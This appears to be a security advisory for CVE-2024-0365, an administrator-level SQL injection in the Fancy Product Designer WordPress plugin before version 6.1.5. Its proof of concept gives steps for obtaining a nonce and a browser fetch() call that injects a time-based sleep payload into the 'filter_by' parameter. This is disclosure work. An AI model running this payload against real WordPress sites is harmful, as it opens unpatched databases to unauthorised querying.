Fancy Product Designer < 6.1.5 – Admin+ SQL Injection | CVE 2024-0365

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators.

Proof of Concept

- Log in as an administrator, and visit /wp-admin/.
- Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer
- Search for "fpd_dismiss_notification" in the page's source, note down the associated nonce
- Send the following fetch() command in your browser's console, and replace $NONCE with the nonce:

```
fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x)) 
```

Notice it takes approximately 20 seconds for the server to answer, confirming our injected SQL statements were executed.